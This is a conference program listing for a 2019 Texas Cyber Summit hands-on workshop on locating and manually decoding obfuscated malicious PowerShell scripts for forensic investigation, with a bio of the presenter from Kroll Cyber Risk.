CF-2003 Finding and Decoding Malicious PowerShell Scripts

Presented at Texas Cyber Summit 2019, Oct. 11, 2019, 1 p.m. (120 minutes).

Malicious PowerShell scripts are becoming the tool of choice for attackers. Although sometimes referred to as “fileless malware”, they can leave behind forensic artifacts for examiners to find. Learn how to locate and identify activity of these malicious PowerShell scripts. Once located, these PowerShell scripts may contains several layers of obfuscation that need to be decoded. Learn how to manually decode them, as well as some light malware analysis on any embedded shellcode through a series of hands on labs. **Requirements:** * Windows system or Windows VM. * User must be able to turn off their AV. * Helpful if Python 2.7 is installed and added to the Path environment variable.

Presenters:

  • Mari Degrazia - Kroll Cyber Risk
    Mari DeGrazia is a Senior Vice President at Kroll Cyber Risk, which provides cyber security services on a global scale. Throughout her career, Mari has investigated high-profile breach cases, worked civil and criminal cases and provided testimony as an expert witness. She has written and released numerous programs/scripts to the forensics community; presented her research at industry conferences; and is a published author in several magazines. She is also a SANS instructor where she loves sharing her knowledge with students. She holds several certifications in addition to earning a B.S. in Computer Science from Hawaii Pacific University.

Links:

Similar Presentations: